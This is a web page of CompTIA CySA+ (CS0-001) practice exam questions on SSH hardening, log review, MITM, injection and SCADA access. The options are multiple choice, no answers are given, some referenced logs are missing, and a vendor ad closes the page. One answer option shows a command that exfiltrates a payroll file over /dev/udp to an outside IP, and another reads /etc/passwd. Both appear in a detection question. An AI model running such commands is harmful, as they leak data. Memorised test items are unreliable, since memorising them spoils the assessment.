CS0-001 Exam Details

  • Exam Code
    :CS0-001
  • Exam Name
    :CompTIA Cybersecurity Analyst (CySA+)
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :416 Q&As
  • Last Updated
    :Feb 05, 2022

CompTIA CS0-001 Online Questions & Answers

  • Question 71:

    A security analyst is reviewing the following log after enabling key-based authentication.

    Given the above information, which of the following steps should be performed NEXT to secure the system?

    A. Disable anonymous SSH logins.
    B. Disable password authentication for SSH.
    C. Disable SSHv1.
    D. Disable remote root SSH logins.

  • Question 72:

    A security analyst is reviewing a report from the networking department that describes an increase in network utilization, which is causing network performance issues on some systems. A top talkers report over a five-minute sample is included.

    Given the above output of the sample, which of the following should the security analyst accomplish FIRST to help track down the performance issues?

    A. Perform reverse lookups on each of the IP addresses listed to help determine if the traffic is necessary.
    B. Recommend that networking block the unneeded protocols such as Quicktime to clear up some of the congestion.
    C. Put ACLs in place to restrict traffic destined for random or non-default application ports.
    D. Quarantine the top talker on the network and begin to investigate any potential threats caused by the excessive traffic.

  • Question 73:

    During a recent breach, an attacker was able to use tcpdump on a compromised Linux server to capture the password of a network administrator that logged into a switch using telnet. Which of the following compensating controls could be implemented to address this going forward?

    A. Whitelist tcpdump of Linux servers.
    B. Change the network administrator password to a more complex one.
    C. Implement separation of duties.
    D. Require SSH on network devices.

  • Question 74:

    A network administrator is attempting to troubleshoot an issue regarding certificates on a secure website.

    During the troubleshooting process, the network administrator notices that the web gateway proxy on the local network has signed all of the certificates on the local machine.

    Which of the following describes the type of attack the proxy has been legitimately programmed to perform?

    A. Transitive access
    B. Spoofing
    C. Man-in-the-middle
    D. Replay

  • Question 75:

    Which of the following is the use of tools to simulate the ability for an attacker to gain access to a specified network?

    A. Reverse engineering
    B. Fuzzing
    C. Penetration testing
    D. Network mapping

  • Question 76:

    A security analyst has determined the security team should take action based on the following log:

    Which of the following should be used to improve the security posture of the system?

    A. Enable login account auditing.
    B. Limit the number of unsuccessful login attempts.
    C. Upgrade the firewalls.
    D. Increase password complexity requirements.

  • Question 77:

    An analyst was tasked with providing recommendations of technologies that are PKI X.509 compliant for a variety of secure functions. Which of the following technologies meet the compatibility requirement? (Select three.)

    A. 3DES
    B. AES
    C. IDEA
    D. PKCS
    E. PGP
    F. SSL/TLS
    G. TEMPEST

  • Question 78:

    A security analyst is reviewing IDS logs and notices the following entry:

    Which of the following attacks is occurring?

    A. Cross-site scripting
    B. Header manipulation
    C. SQL injection
    D. XML injection

  • Question 79:

    While reviewing three months of logs, a security analyst notices probes from random company laptops going to SCADA equipment at the company's manufacturing location. Some of the probes are getting responses from the equipment even though firewall rules are in place, which should block this type of unauthorized activity. Which of the following should the analyst recommend to keep this activity from originating from company laptops?

    A. Implement a group policy on company systems to block access to SCADA networks.
    B. Require connections to the SCADA network to go through a forwarding proxy.
    C. Update the firewall rules to block SCADA network access from those laptop IP addresses.
    D. Install security software and a host-based firewall on the SCADA equipment.

  • Question 80:

    A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

    A. nmap –A –sV 192.168.1.235
    B. cat payroll.csv > /dev/udp/123.456.123.456/53
    C. cat/etc/passwd
    D. mysql –h 192.168.1.235 –u test -p

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CS0-001 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.